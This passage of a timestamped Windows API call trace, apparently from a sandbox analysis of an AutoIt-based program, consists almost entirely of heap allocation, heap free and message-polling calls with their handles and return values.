[0257.460] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.460] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe078 | out: hHeap=0xbc0000) returned 1 [0257.460] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc018c8 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dc0 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.460] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcd9d48 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b08 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.460] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01958 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.460] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda600 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.461] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.461] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1e0 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b88 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d78 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01978 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9da8 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.461] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.461] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.461] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.461] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9be0 | out: hHeap=0xbc0000) returned 1 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.461] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01878 [0257.461] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9be0 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.462] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019a8 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9be0 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.462] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01878 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.462] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.463] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.463] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019b8 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01998 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.463] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.463] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.464] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019c8 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.464] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.464] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.464] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.464] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.465] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.465] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.465] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.465] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.465] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.466] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.466] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.466] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.466] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.466] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.467] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.467] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.467] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.467] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.467] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.467] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.467] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.467] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.467] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.467] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.467] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.467] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.467] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.468] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.468] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9df0 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.468] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.468] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.468] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.469] RtlAllocateHeap (HeapHandle=0xbc0000, 